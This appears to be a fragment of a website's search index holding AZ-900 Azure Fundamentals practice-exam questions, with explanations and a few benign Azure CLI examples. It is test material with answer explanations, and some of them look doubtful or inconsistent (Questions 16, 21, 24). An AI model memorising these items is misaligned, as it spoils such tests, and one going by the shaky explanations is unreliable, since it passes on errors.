                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-style-of-computing-is-easiest-when-migrating-an-existing-hosted-application-from-your-own-data-center-into-the-cloud","title":"Question 49:\u00a0Which style of computing is easiest when migrating an existing hosted application from your own data center into the cloud?","text":"
                            • PaaS
                            • IaaS
                            • FaaS
                            • Serverless

                            Explanation: Infrastructure as a service is the easiest to migrate into, from an existing hosted app - lift and shift. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-if-you-have-an-azure-free-account-with-a-200-credit-for-the-first-month-what-happens-when-you-reach-the-200-limit","title":"Question 50:\u00a0If you have an Azure free account, with a $200 credit for the first month, what happens when you reach the $200 limit?","text":"
                            • Your account is automatically closed.
                            • Your credit card is automatically billed.
                            • All services are stopped and you must decide whether you want to convert to a paid account or not.
                            • You cannot create any more resources until you add more credits to the account.

                            Explanation: Using up the free credits causes all your resources to be stopped until you decide to get a paid account. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-4","title":"Test 4","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-all-resources-in-a-vnet-can-communicate-outbound-to-the-internet-by-default","title":"Question 1:\u00a0All resources in a VNet can communicate outbound to the internet, by default.","text":"
                            • No
                            • Yes

                            Azure Virtual Network (VNet)\u00a0is the fundamental building block for your private network in Azure. VNet enables many types of Azure resources, such as Azure Virtual Machines (VM), to securely communicate with each other, the internet, and on-premises networks. VNet is similar to a traditional network that you'd operate in your own data center, but brings with it additional benefits of Azure's infrastructure such as scale, availability, and isolation. All resources in a VNet can communicate outbound to the internet, by default. You can communicate inbound to a resource by assigning a public IP address or a public Load Balancer. You can also use public IP or public Load Balancer to manage your outbound connections. To learn more about outbound connections in Azure, see\u00a0Outbound connections,\u00a0Public IP addresses, and\u00a0Load Balancer
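
                            A minimal sketch of creating such a network (names and address ranges are placeholders):

                            # A VNet with one subnet; outbound internet works by default,
                            # inbound requires a public IP or a public Load Balancer
                            az network vnet create --resource-group demo-rg --name demo-vnet \
                              --address-prefix 10.0.0.0/16 --subnet-name web --subnet-prefix 10.0.1.0/24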

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-is-it-possible-for-you-to-run-both-bash-and-powershell-based-scripts-from-the-azure-cloud-shell","title":"Question 2:\u00a0Is it possible for you to run BOTH\u00a0Bash and Powershell based scripts from the Azure Cloud shell?","text":"
                            • Yes
                            • No

                            Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-as-the-cloud-admin-of-your-organization-you-want-to-block-your-employees-from-accessing-your-apps-from-specific-locations-which-of-the-following-can-help-you-achieve-this","title":"Question 3:\u00a0As the Cloud Admin of your organization, you want to Block your employees from accessing your apps from specific locations. Which of the following can help you achieve this?","text":"
                            • Azure Active Directory Conditional Access
                            • Azure Sentinel - Azure Single Sign On (SSO)
                            • Azure Role Based Access Control (RBAC)

                            The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Example: A payroll manager wants to access the payroll application and is required to do multi-factor authentication to access it.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-is-the-primary-purpose-of-external-identities-in-azure-active-directory","title":"Question 4:\u00a0What is the primary purpose of external identities in Azure Active Directory?","text":"
                            • To enable single sign-on between Azure subscriptions.
                            • To manage user identities exclusively for on-premises applications.
                            • To allow external partners and customers to access resources in your Azure environment
                            • To provide secure access to Azure resources for employees within the organization.

                            External identities in Azure AD enable organizations to extend their identity management beyond their own employees. This allows external partners, vendors, and customers to access specific resources within the organization's Azure environment without requiring them to have internal accounts. Reference:\u00a0https://learn.microsoft.com/en-us/azure/active-directory/external-identities/external-identities-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-your-startup-plans-to-migrate-to-azure-soon-but-for-all-the-resources-you-would-like-control-of-the-underlying-operating-system-and-middleware-which-of-the-following-cloud-models-would-make-the-most-sense","title":"Question 5:\u00a0Your startup plans to migrate to Azure soon, but for all the resources, you would like control of the underlying Operating System and Middleware. Which of the following cloud models would make the most sense?","text":"
                            • Infrastructure as a Service (laaS)
                            • Anything as a Service (XaaS)
                            • Platform as a Service (PaaS)
                            • Software as a Service (SaaS)

                            Infrastructure as a service (IaaS)\u00a0is a type of cloud computing service that offers essential compute, storage, and networking resources on demand, on a pay-as-you-go basis. IaaS is one of the four types of cloud services, along with software as a service (SaaS), platform as a service (PaaS), and\u00a0serverless. Migrating your organization's infrastructure to an IaaS solution helps you reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. IaaS solutions give you the flexibility to scale your IT resources up and down with demand. They also help you quickly provision new applications and increase the reliability of your underlying infrastructure. IaaS lets you bypass the cost and complexity of buying and managing physical servers and datacenter infrastructure. Each resource is offered as a separate service component, and you only pay for a particular resource for as long as you need it. A\u00a0cloud computing service provider\u00a0like\u00a0Azure\u00a0manages the infrastructure, while you purchase, install, configure, and manage your own software\u2014including operating systems, middleware, and applications.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-your-company-has-decided-to-migrate-its-on-premises-virtual-machines-to-azure-which-azure-virtual-machines-feature-allows-you-to-migrate-virtual-machines-without-downtime","title":"Question 6:\u00a0Your company has decided to migrate its on-premises virtual machines to Azure. Which Azure Virtual Machines feature allows you to migrate virtual machines without downtime?","text":"
                            • Azure Virtual Machine Scale Sets
                            • Azure Site Recovery
                            • Azure Spot Virtual Machines
                            • Azure Reserved Virtual Machines

                            The correct answer is Azure Site Recovery. Azure Site Recovery (ASR)\u00a0is a service offered by Azure that enables replication of virtual machines from on-premises environments to Azure or between Azure regions with little or no downtime. This allows for the migration of virtual machines to Azure without any disruption to business operations. After replication to Azure, the virtual machines can be launched and used as if they were in the on-premises environment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-youve-been-planning-to-decommission-your-on-prem-database-hosting-gigabytes-of-data-which-of-the-following-is-true-about-data-ingress-moving-into-for-azure","title":"Question 7:\u00a0You've been planning to decommission your On-Prem database hosting Gigabytes of data. Which of the following is True about data ingress (moving into) for Azure?","text":"
                            • It is free of cost
                            • It is charged $0.05 per GB
                            • It is charged $0.05 per TB
                            • It is charged per hour of data transferred

                            Bandwidth refers to data moving in and out of Azure data centres, as well as data moving between Azure data centres; other transfers are explicitly covered by the Content Delivery Network, ExpressRoute pricing, or Peering. Data ingress (data moving into Azure) is free of cost.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-of-the-following-is-a-cloud-security-posture-management-cspm-and-cloud-workload-protection-platform-cwpp-for-all-of-your-azure-on-premises-and-multicloud-amazon-aws-and-google-gcp-resources","title":"Question 8: Which of the following is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, On-Premises, AND Multicloud (Amazon AWS and Google GCP) resources?","text":"
                            • Microsoft Defender for Cloud
                            • Azure DDoS Protection
                            • Azure Front Door
                            • Azure Key Vault
                            • Azure Sentinel

                            Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud fills three vital needs as you manage the security of your resources and workloads in the cloud and on-premises:

                            • Defender for Cloud secure score continually assesses your security posture so you can track new security opportunities and precisely report on the progress of your security efforts.
                            • Defender for Cloud recommendations secures your workloads with step-by-step actions that protect your workloads from known security risks.
                            • Defender for Cloud alerts defends your workloads in real-time so you can react immediately and prevent security events from developing.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-which-of-the-following-is-a-key-benefit-of-using-role-based-access-control-rbac-over-traditional-access-control-methods","title":"Question 9:\u00a0Which of the following is a key benefit of using Role-Based Access Control (RBAC) over traditional access control methods?","text":"
                            • RBAC supports a wider range of authentication protocols than traditional methods.
                            • RBAC provides centralized management of user identities and access.
                            • RBAC allows you to assign permissions to specific roles rather than individual users.
                            • RBAC provides stronger encryption for sensitive data.

                            Role-Based Access Control (RBAC)\u00a0is an approach to access control that allows you to manage user access based on the roles they perform within an organization. With RBAC, you can define a set of roles, each with a specific set of permissions, and then assign users to those roles.

                            One of the key benefits of RBAC over traditional access control methods is that it allows you to assign permissions to specific\u00a0roles\u00a0rather than individual users. This means that when a user's role changes, their permissions can be automatically adjusted without the need for manual updates. This can help to streamline the process of managing access control and reduce the risk of errors or oversights.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-which-of-the-following-provides-support-for-key-migration-workloads-like-windows-sql-and-linux-server-databases-data-web-apps-and-virtual-desktops","title":"Question 10:\u00a0Which of the following provides support for key migration workloads like Windows, SQL and Linux Server, databases, data, web apps, and virtual desktops?","text":"
                            • Azure Suggestions
                            • Azure Recommendations
                            • Azure Advisor
                            • Azure Migrate

                            Azure Migrate\u00a0provides all the Azure migration tools and guidance you need to plan and implement your move to the cloud\u2014and track your progress using a central dashboard that provides intelligent insights. Use a\u00a0comprehensive approach\u00a0to migrating your application and datacenter estate. Get support for key migration workloads like\u00a0Windows,\u00a0SQL\u00a0and\u00a0Linux Server, databases, data,\u00a0web apps, and virtual desktops. Migrate to destinations including Azure Virtual Machines, Azure VMware Solution, Azure App Service, and Azure SQL Database. Migrations are holistic across VMware, Hyper-V, physical server, and cloud-to-cloud migration.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-which-type-of-scaling-focuses-on-adjusting-the-capabilities-of-resources-such-as-increasing-processing-power","title":"Question 11: Which type of scaling focuses on adjusting the capabilities of resources, such as increasing processing power?","text":"
                            • Static scaling
                            • Vertical scaling
                            • Elastic scaling
                            • Horizontal scaling

                            Vertical scaling involves adjusting the capabilities of resources, such as adding more CPUs or RAM to a virtual machine. It focuses on enhancing the capacity of individual resources. With horizontal scaling, by contrast, a steep jump in demand is handled by scaling out (either automatically or manually), for example by adding more virtual machines or containers, and a significant drop in demand is handled by scaling in (either automatically or manually) and removing them.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-is-the-default-action-for-a-network-security-rule-nsg-rule-if-no-other-action-is-specified","title":"Question 12:\u00a0 What is the default action for a Network Security Rule (NSG) rule if no other action is specified?","text":"
                            • Allow
                            • Block
                            • Deny

                            The default action for an NSG rule if no other action is specified is\u00a0DENY.
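
                            That deny comes from the built-in DenyAllInbound default rule, which can be inspected on any NSG (a sketch; the names are placeholders):

                            az network nsg show --resource-group demo-rg --name web-nsg \
                              --query 'defaultSecurityRules[].{name:name, access:access, priority:priority}' -o table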

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-what-is-the-primary-purpose-of-a-public-endpoint-in-azure","title":"Question 13:\u00a0What is the primary purpose of a public endpoint in Azure?","text":"
                            • To prevent communication between virtual networks.
                            • To enforce access control policies for resource groups.
                            • To restrict incoming network traffic to specific IP ranges.
                            • To provide a direct and secure connection to Azure services.

                            A\u00a0public\u00a0endpoint in Azure allows resources to be accessed over the public internet. It's used to expose services to clients or users who are not within the same network as the resource. Public endpoints are commonly used for services that need to be accessed from anywhere, such as web applications.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-what-is-the-minimum-azure-ad-edition-required-to-enable-self-service-password-reset-for-users","title":"Question 14:\u00a0What is the minimum Azure AD edition required to enable self-service password reset for users?","text":"
                            • Premium P2 edition
                            • Premium P1 edition
                            • Basic edition
                            • Free edition

                            The correct answer is Premium P1: it is the minimum edition required to enable self-service password reset for users in Azure AD. Reference: https://azure.microsoft.com/en-us/pricing/details/active-directory/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-an-_____-is-a-collection-of-policy-definitions-that-are-grouped-together-towards-a-specific-goal-or-purpose-in-mind","title":"Question 15: An\u00a0 _____\u00a0 is a collection of policy definitions that are grouped together towards a specific goal or purpose in mind.","text":"
                            • Azure Collection
                            • Azure Initiative
                            • Azure Group
                            • Azure Bundle

                            An Azure initiative is a collection of Azure policy definitions that are grouped together towards a specific goal or purpose in mind. Azure initiatives simplify management of your policies by grouping a set of policies together as one single item. For example, you could use the PCI-DSS built-in initiative which has all the policy definitions that are centered around meeting PCI-DSS compliance. Similar to Azure Policy, initiatives have definitions (a bunch of policies), assignments, and parameters. Once you determine the definitions that you want, you would assign the initiative to a scope so that it can be applied.
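
                            Assigning an initiative to a scope can be sketched in the CLI as follows (the initiative name and subscription ID are placeholders):

                            # Assign an existing initiative (policy set definition) at subscription scope
                            az policy assignment create \
                              --name pci-dss-assignment \
                              --policy-set-definition <initiative-name-or-id> \
                              --scope /subscriptions/<subscription-id>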

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-which-service-would-you-use-to-reduce-the-overhead-of-manually-assigning-permissions-to-a-set-of-resources","title":"Question 16:\u00a0Which service would you use to reduce the overhead of manually assigning permissions to a set of resources?","text":"
                            • Azure Resource Manager
                            • Azure Trust Center
                            • Azure Policy
                            • Azure Logic Apps

                            Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features, like access control, locks, and tags, to secure and organize your resources after deployment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-of-the-following-authentication-protocols-is-not-supported-by-azure-ad","title":"Question 17:\u00a0Which of the following authentication protocols is not supported by Azure AD?","text":"
                            • OpenID Connect
                            • NTLM
                            • OAuth 2.0
                            • SAML

                            Azure AD does support SAML, OAuth 2.0, and OpenID Connect authentication protocols. However,\u00a0NTLM\u00a0is not supported by Azure AD. NTLM is a legacy authentication protocol that is not recommended for modern authentication scenarios due to its security limitations. Azure AD recommends using modern authentication protocols such as SAML, OAuth 2.0, and OpenID Connect, which provide stronger security and support features such as multi-factor authentication and conditional access. Therefore, the correct answer is NTLM.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-of-the-following-is-an-offline-tier-optimized-for-storing-data-that-is-rarely-accessed-and-that-has-flexible-latency-requirements","title":"Question 18:\u00a0Which of the following is an offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements?","text":"
                            • Cool Tier
                            • Infrequent Tier
                            • Hot Tier
                            • Archive Tier

                            Data stored in the cloud grows at an exponential pace. To manage costs for your expanding storage needs, it can be helpful to organize your data based on how frequently it will be accessed and how long it will be retained. Azure storage offers different access tiers so that you can store your blob data in the most cost-effective manner based on how it's being used. Azure Storage access tiers include:

                            • Hot tier\u00a0- An online tier optimized for storing data that is accessed or modified frequently. The Hot tier has the highest storage costs, but the lowest access costs.
                            • Cool tier\u00a0- An online tier optimized for storing data that is infrequently accessed or modified. Data in the Cool tier should be stored for a minimum of 30 days. The Cool tier has lower storage costs and higher access costs compared to the Hot tier.
                            • Archive tier\u00a0- An offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements, on the order of hours. Data in the Archive tier should be stored for a minimum of 180 days.
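
                            Tiering is set per blob (or via lifecycle management rules); a sketch with placeholder names:

                            # Move a rarely accessed blob to the Archive tier
                            az storage blob set-tier --account-name demostorage \
                              --container-name backups --name 2023-backup.tar --tier Archive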
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-___-brings-signals-together-to-make-decisions-and-enforce-organizational-policies-in-simple-terms-they-are-if-then-statements-if-a-user-wants-to-access-a-resource-then-they-must-complete-an-action","title":"Question 19:\u00a0___ brings signals together, to make decisions, and enforce organizational policies. In simple terms, they are if-then statements, if a user wants to access a resource, then they must complete an action.","text":"
                            • Demand Access
                            • Logical Access
                            • Conditional Access
                            • Active Directory Access

                            The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-services-can-you-use-to-calculate-your-estimated-hourly-or-monthly-costs-for-using-azure","title":"Question 20: Which of the following services can you use to calculate your estimated hourly or monthly costs for using Azure?","text":"
                            • Azure Total Cost of Ownership (TCO)\u00a0calculator
                            • Azure Pricing Calculator
                            • Azure Calculator
                            • Azure Cost Management

                            You can use the\u00a0Azure Pricing Calculator\u00a0to calculate your estimated hourly or monthly costs for using Azure.\u00a0Azure TCO\u00a0on the other hand is primarily used to estimate the cost savings you can realize by migrating your workloads to Azure.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-of-the-following-protocols-is-used-for-federated-authentication-in-azure-ad","title":"Question 21:\u00a0Which of the following protocols is used for federated authentication in Azure AD?","text":"
                            • LDAP
                            • OpenID Connect
                            • OAuth 2.0
                            • SAML

                            SAML (Security Assertion Markup Language)\u00a0is the protocol used for federated authentication in Azure AD. Federated authentication is a mechanism that allows users to use their existing credentials from a trusted identity provider (IdP) to authenticate with another application or service. In the context of Azure AD, federated authentication allows users to use their existing corporate credentials to authenticate with cloud-based applications and services. Azure AD supports several federated authentication protocols, including Security Assertion Markup Language (SAML), OAuth 2.0, and OpenID Connect. SAML is widely used for federated authentication in enterprise environments, while OAuth 2.0 and OpenID Connect are commonly used in web and mobile applications. Reference: https://docs.microsoft.com/en-us/azure/active-directory/develop/single-sign-on-saml-protocol

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-the-microsoft-_______-provides-a-variety-of-content-tools-and-other-resources-about-microsoft-security-privacy-and-compliance-practices","title":"Question 22: The Microsoft _______ provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices.","text":"
                            • Privacy Policy
                            • Blueprints
                            • Service Trust Portal
                            • Advisor

                            The Microsoft Service Trust Portal provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices. The Service Trust Portal contains details about Microsoft's implementation of controls and processes that protect our cloud services and the customer data therein. To access some of the resources on the Service Trust Portal, you must log in as an authenticated user with your Microsoft cloud services account (Azure Active Directory organization account) and review and accept the Microsoft Non-Disclosure Agreement for Compliance Materials.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-can-help-you-automate-deployments-and-use-the-practice-of-infrastructure-as-code","title":"Question 23:\u00a0Which of the following can help you automate deployments and use the practice of infrastructure as code?","text":"
                            • Management Groups
                            • ARM\u00a0Templates
                            • Azure Arc
                            • Azure IaaC

                            To implement infrastructure as code for your Azure solutions, use\u00a0Azure Resource Manager templates (ARM templates).\u00a0The template is a JavaScript Object Notation (JSON) file that defines the infrastructure and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
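As a minimal sketch of how such a template is used, the Azure CLI can deploy it into a resource group; the file name, parameter, and resource names below are hypothetical:

```bash
# Create a resource group and deploy a declarative ARM template into it
# (azuredeploy.json, the parameter, and the group name are placeholders).
az group create --name demo-rg --location westeurope

az deployment group create \
    --resource-group demo-rg \
    --template-file azuredeploy.json \
    --parameters environment=dev
```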

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-yes-or-no-it-is-possible-to-deploy-a-new-azure-virtual-network-vnet-using-powerautomate-on-a-google-chromebook","title":"Question 24:\u00a0Yes or No: It is possible to deploy a new Azure Virtual Network (VNet) using PowerAutomate on a Google Chromebook.","text":"
                            • No
                            • Yes

                            No. Power Automate is part of the Microsoft Power Platform and is\u00a0not\u00a0a part of Azure, so it cannot be used to deploy a VNet, regardless of the device used.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-___-is-a-unified-cloud-native-application-protection-platform-that-helps-strengthen-your-security-posture-enables-protection-against-modern-threats-and-helps-reduce-risk-throughout-the-cloud-application-lifecycle-across-multicloud-and-hybrid-environments","title":"Question 25: ___ is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.","text":"
                            • Azure Bastion
                            • Azure Firewall
                            • Microsoft Priva
                            • Microsoft Defender for Cloud
                            • Azure Network Security Group

                            From the official documentation:\u00a0Microsoft Defender for Cloud is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-__-infrastructure-as-code-involves-writing-scripts-in-languages-like-bash-or-powershell-you-explicitly-state-commands-that-are-executed-to-produce-a-desired-outcome","title":"Question 26:\u00a0__ Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome.","text":"
                            • Declarative
                            • Imperative
                            • Ad-Hoc
                            • Defined

                            There are two approaches you can take when implementing Infrastructure as Code.

                            • Imperative Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome. When you use imperative deployments, it's up to you to manage the sequence of dependencies, error control, and resource updates (see the sketch after this list).
                            • Declarative Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished. The tooling figures out how to make the outcome happen by inspecting your current state, comparing it to your target state, and then applying the differences.
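A rough sketch of the imperative style: each Azure CLI command is stated explicitly, and sequencing and error handling are left to the script author (all names are placeholders):

```bash
#!/bin/bash
# Imperative IaC sketch: every step is an explicit command, and the
# ordering and error handling are the script author's responsibility.
set -euo pipefail

az group create --name demo-rg --location westeurope

az network vnet create \
    --resource-group demo-rg --name demo-vnet \
    --address-prefix 10.0.0.0/16 \
    --subnet-name default --subnet-prefixes 10.0.0.0/24

az vm create \
    --resource-group demo-rg --name demo-vm \
    --image Ubuntu2204 \
    --vnet-name demo-vnet --subnet default \
    --admin-username azureuser --generate-ssh-keys
```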
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-which-of-these-approaches-is-not-a-cost-saving-solutions","title":"Question 27:\u00a0Which of these approaches is NOT a cost saving solutions?","text":"
                            • Use Reserved Instances with Azure Hybrid
                            • Load balancing the incoming traffic
                            • Use the correct and appropriate instance size based on current workload
                            • Making use of Azure Cost Management

                            Load balancing is done to increase the overall availability of the application,\u00a0not\u00a0to optimize costs.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-______-infrastructure-as-code-involves-writing-a-definition-that-defines-how-you-want-your-environment-to-look-in-this-definition-you-specify-a-desired-outcome-rather-than-how-you-want-it-to-be-accomplished","title":"Question 28: ______ Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished.","text":"
                            • Ad-Hoc
                            • Imperative
                            • Declarative
                            • Defined
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-which-of-the-following-can-you-use-to-set-spending-thresholds","title":"Question 29:\u00a0Which of the following can you use to set spending thresholds?","text":"
                            • Azure Cost Management +\u00a0Billing
                            • Azure TCO
                            • Azure Policy
                            • Azure Pricing Calculator
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-azure-compliance-certifications-is-specifically-designed-for-the-healthcare-industry","title":"Question 30:\u00a0Which of the following Azure compliance certifications is specifically designed for the healthcare industry?","text":"
                            • ISO 27001
                            • GDPR
                            • None of the above
                            • HIPAA/HITECH
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-can-help-you-manage-multiple-azure-subscriptions","title":"Question 31:\u00a0Which of the following can help you manage multiple Azure Subscriptions?","text":"
                            • Policies
                            • Management Groups
                            • Resource Groups
                            • Blueprints

                            Each management group contains one or more subscriptions. Azure arranges management groups in a single hierarchy. You define this hierarchy in your Azure Active Directory (Azure AD) tenant to align with your organization's structure and needs.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-in-the-_-as-a-service-cloud-service-model-customers-are-responsible-for-managing-applications-data-runtime-middleware-and-operating-systems-while-the-cloud-provider-manages-the-underlying-infrastructure","title":"Question 32:\u00a0In the _ as a Service cloud service model, customers are responsible for managing applications, data, runtime, middleware, and operating systems, while the cloud provider manages the underlying infrastructure.","text":"
                            • Infrastructure
                            • Platform
                            • Software
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-when-a-blob-is-in-the-archive-access-tier-what-must-you-do-first-before-accessing-it","title":"Question 33:\u00a0When a blob is in the archive access tier, what must you do first before accessing it?","text":"
                            • Rehydrate it
                            • Modify its policy
                            • Add it to a new resource group
                            • Move it to File Storage
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-your-company-has-deployed-a-web-application-to-azure-and-you-want-to-restrict-access-to-it-from-the-internet-while-allowing-access-from-your-companys-on-premises-network-which-network-security-group-nsg-rule-would-you-configure","title":"Question 34:\u00a0Your company has deployed a web application to Azure, and you want to restrict access to it from the internet while allowing access from your company's on-premises network. Which Network Security Group (NSG) rule would you configure?","text":"
                            • Inbound rule allowing traffic from any source to the web application's public IP address.
                            • Inbound rule allowing traffic from your company's on-premises network to the web application's private IP address.
                            • Outbound rule allowing traffic from any destination to your company's on-premises network.
                            • Outbound rule allowing traffic from the web application's private IP address to any destination.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-can-help-you-download-cost-and-usage-data-that-was-used-to-generate-your-monthly-invoice","title":"Question 35:\u00a0Which of the following can help you download cost and usage data that was used to generate your monthly invoice?","text":"
                            • Azure Monitor
                            • Azure Cost Management
                            • Azure Advisor
                            • Azure Resource Manager

                            Cost Management + Billing is a suite of tools provided by Microsoft that help you analyze, manage, and optimize the costs of your workloads. Using the suite helps ensure that your organization is taking advantage of the benefits provided by the cloud. You use Cost Management + Billing features to:

                            • Conduct billing administrative tasks such as paying your bill
                            • Manage billing access to costs
                            • Download cost and usage data that was used to generate your monthly invoice
                            • Proactively apply data analysis to your costs
                            • Set spending thresholds
                            • Identify opportunities for workload changes that can optimize your spending
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-____-asynchronously-replicates-the-same-applications-and-data-across-other-azure-regions-for-disaster-recovery-protection","title":"Question 36:\u00a0____ asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection.","text":"
                            • Cross-region replication
                            • Auto-Region Replication
                            • Auto-Region Replicas
                            • Across-Region Replication

                            Cross-region replication is one of several important pillars in the Azure business continuity and disaster recovery strategy. Cross-region replication builds on the synchronous replication of your applications and data that exists by using availability zones within your primary Azure region for high availability. Cross-region replication asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection. Some Azure services take advantage of cross-region replication to ensure business continuity and protect against data loss. Azure provides several\u00a0storage solutions\u00a0that make use of cross-region replication to ensure data availability. For example,\u00a0Azure geo-redundant storage\u00a0(GRS) replicates data to a secondary region automatically. This approach ensures that data is durable even if the primary region isn't recoverable.
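As an illustration, geo-redundant replication is selected through the storage account SKU; the account and resource-group names below are hypothetical:

```bash
# Create a storage account whose data is automatically geo-replicated
# (GRS) to a paired secondary region (names are placeholders).
az storage account create \
    --name mygrsaccount \
    --resource-group demo-rg \
    --location westeurope \
    --sku Standard_GRS
```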

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-you-want-to-ensure-that-all-virtual-machines-deployed-in-your-azure-environment-are-configured-with-specific-antivirus-software-which-azure-service-can-you-use-to-enforce-this-policy","title":"Question 37:\u00a0You want to ensure that all virtual machines deployed in your Azure environment are configured with specific antivirus software. Which Azure service can you use to enforce this policy?","text":"
                            • Azure Security Center
                            • Azure Policy
                            • Azure Monitor
                            • Azure Advisor
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-of-the-following-is-not-a-benefit-of-using-azure-arc","title":"Question 38:\u00a0Which of the following is NOT a benefit of using Azure Arc?","text":"
                            • Centralized billing and cost management for all resources
                            • Improved security and compliance for resources
                            • Increased visibility and control over resources
                            • Consistent management of resources across hybrid environments

